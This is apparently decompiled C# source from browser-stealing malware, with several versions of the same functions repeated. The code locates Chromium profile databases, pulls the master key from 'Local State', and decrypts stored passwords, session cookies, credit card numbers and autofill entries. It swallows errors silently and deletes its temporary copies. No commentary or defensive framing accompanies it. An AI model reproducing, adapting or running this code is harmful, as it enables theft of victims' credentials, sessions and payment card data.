// Token: 0x060002E4 RID: 740 RVA: 0x0000E6C0 File Offset: 0x0000C8C0 private static LoginPair ReadData(SqlConnection manager, int row, string chromeKey) { LoginPair loginPair = new LoginPair(); try { if (manager.Fields.Contains("Password_value")) { loginPair.Host = manager.ParseValue(row, "Origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "Username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "Password_value"), chromeKey); } else if (manager.Fields.Contains("password_value")) { loginPair.Host = manager.ParseValue(row, "origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "password_value"), chromeKey); } } catch (Exception) { } finally { loginPair.Login = (string.IsNullOrWhiteSpace(loginPair.Login) ? "UNKNOWN" : loginPair.Login); loginPair.Password = (string.IsNullOrWhiteSpace(loginPair.Password) ? "UNKNOWN" : loginPair.Password); loginPair.Host = (string.IsNullOrWhiteSpace(loginPair.Host) ? "UNKNOWN" : loginPair.Host); } return(loginPair); }
private static List <Cookie> EnumCook(string profilePath) { List <Cookie> cookieList = new List <Cookie>(); try { string str = Path.Combine(profilePath, "Cookies"); if (!File.Exists(str)) { return(cookieList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("cookies"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { Cookie cookie = (Cookie)null; try { cookie = new Cookie() { Host = sqlConnection.ParseValue(rowIndex, "host_key").Trim(), Http = sqlConnection.ParseValue(rowIndex, "httponly") == "1", Path = sqlConnection.ParseValue(rowIndex, "path").Trim(), Secure = sqlConnection.ParseValue(rowIndex, "secure") == "1", Expires = sqlConnection.ParseValue(rowIndex, "expires_utc").Trim(), Name = sqlConnection.ParseValue(rowIndex, "name").Trim(), Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "encrypted_value"), localStatePath) }; } catch { } if (cookie != null) { cookieList.Add(cookie); } } } catch { } return(cookieList); }
private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> creditCardList = new List <CreditCard>(); try { string str = Path.Combine(profilePath, "Web Data"); if (!File.Exists(str)) { return(creditCardList); } string[] strArray = profilePath.Split(new string[1] { "\\" }, StringSplitOptions.RemoveEmptyEntries); string localStatePath = Path.Combine(string.Join("\\", ((IEnumerable <string>)strArray).Take <string>(strArray.Length - 1).ToArray <string>()), "Local State"); SqlConnection sqlConnection = new SqlConnection(DecryptHelper.CreateTempCopy(str)); sqlConnection.ReadTable("credit_cards"); for (int rowIndex = 0; rowIndex < sqlConnection.RowLength; ++rowIndex) { CreditCard creditCard = (CreditCard)null; try { creditCard = new CreditCard() { Holder = sqlConnection.ParseValue(rowIndex, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(rowIndex, "expiration_year").Trim()), CardNumber = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(rowIndex, "card_number_encrypted"), localStatePath) }; } catch { } if (creditCard != null) { creditCardList.Add(creditCard); } } } catch { } return(creditCardList); }
private static LoginPair ReadData( SqlConnection manager, int row, string localStatePath) { LoginPair loginPair = new LoginPair(); try { loginPair.Host = manager.ParseValue(row, "origin_url").Trim(); loginPair.Login = manager.ParseValue(row, "username_value").Trim(); loginPair.Password = ChromiumEngine.DecryptChromium(manager.ParseValue(row, "password_value"), localStatePath); } catch { } finally { loginPair.Login = string.IsNullOrEmpty(loginPair.Login) ? "UNKNOWN" : loginPair.Login; loginPair.Password = string.IsNullOrEmpty(loginPair.Password) ? "UNKNOWN" : loginPair.Password; loginPair.Host = string.IsNullOrEmpty(loginPair.Host) ? "UNKNOWN" : loginPair.Host; } return(loginPair); }
// Token: 0x060002E3 RID: 739 RVA: 0x0000E458 File Offset: 0x0000C658 private static List <CreditCard> EnumCC(string profilePath) { List <CreditCard> list = new List <CreditCard>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text3)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text2 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text2)) { text2 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text2)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text2, out flag); text3 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("credit_cards"); for (int i = 0; i < sqlConnection.RowLength; i++) { CreditCard creditCard = null; try { string text5 = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(i, "card_number_encrypted"), text3).Replace(" ", string.Empty); creditCard = new CreditCard { Holder = sqlConnection.ParseValue(i, "name_on_card").Trim(), ExpirationMonth = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_month").Trim()), ExpirationYear = Convert.ToInt32(sqlConnection.ParseValue(i, "expiration_year").Trim()), CardNumber = text5, CardType = DecryptHelper.DetectCreditCardType(text5) }; } catch { } if (creditCard != null) { list.Add(creditCard); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }
// Token: 0x060002E2 RID: 738 RVA: 0x0000E228 File Offset: 0x0000C428 private static List <Autofill> EnumFills(string profilePath) { List <Autofill> list = new List <Autofill>(); try { string text = Path.Combine(profilePath, "Web Data"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text2)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text3 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text3)) { text3 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text3)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text3, out flag); text2 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("autofill"); for (int i = 0; i < sqlConnection.RowLength; i++) { Autofill autofill = null; try { string text5 = sqlConnection.ParseValue(i, "value").Trim(); if (text5.StartsWith("v10") || text5.StartsWith("v11")) { text5 = ChromiumEngine.DecryptChromium(text5, text2); } autofill = new Autofill { Name = sqlConnection.ParseValue(i, "name").Trim(), Value = text5 }; } catch { } if (autofill != null) { list.Add(autofill); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }
// Token: 0x060002E1 RID: 737 RVA: 0x0000DF4C File Offset: 0x0000C14C private static List <Cookie> EnumCook(string profilePath) { List <Cookie> list = new List <Cookie>(); try { string text = Path.Combine(profilePath, "Cookies"); if (!File.Exists(text)) { return(list); } string text2 = string.Empty; string text3 = string.Empty; if (string.IsNullOrWhiteSpace(text2)) { try { string[] array = profilePath.Split(new string[] { "\\" }, StringSplitOptions.RemoveEmptyEntries); array = array.Take(array.Length - 1).ToArray <string>(); text3 = Path.Combine(string.Join("\\", array), "Local State"); if (!File.Exists(text3)) { text3 = Path.Combine(profilePath, "Local State"); } if (File.Exists(text3)) { try { bool flag; string path = DecryptHelper.TryCreateTemp(text3, out flag); text2 = File.ReadAllText(path).FromJSON()["os_crypt"]["encrypted_key"].ToString(false); if (flag) { File.Delete(path); } } catch (Exception) { } } } catch { } } bool flag2; string text4 = DecryptHelper.TryCreateTemp(text, out flag2); try { SqlConnection sqlConnection = new SqlConnection(text4); sqlConnection.ReadTable("cookies"); string fieldName = sqlConnection.Fields.Contains("is_secure") ? "is_secure" : "secure"; sqlConnection.Fields.Contains("is_httponly"); for (int i = 0; i < sqlConnection.RowLength; i++) { Cookie cookie = null; try { cookie = new Cookie { Host = sqlConnection.ParseValue(i, "host_key").Trim(), Http = sqlConnection.ParseValue(i, "host_key").Trim().StartsWith("."), Path = sqlConnection.ParseValue(i, "path").Trim(), Secure = (sqlConnection.ParseValue(i, fieldName) == "1"), Expires = Convert.ToInt64(sqlConnection.ParseValue(i, "expires_utc").Trim()) / 1000000L - 11644473600L, Name = sqlConnection.ParseValue(i, "name").Trim(), Value = ChromiumEngine.DecryptChromium(sqlConnection.ParseValue(i, "encrypted_value"), text2) }; } catch { } if (cookie != null) { list.Add(cookie); } } } catch { } if (flag2) { File.Delete(text4); } } catch (Exception) { } return(list); }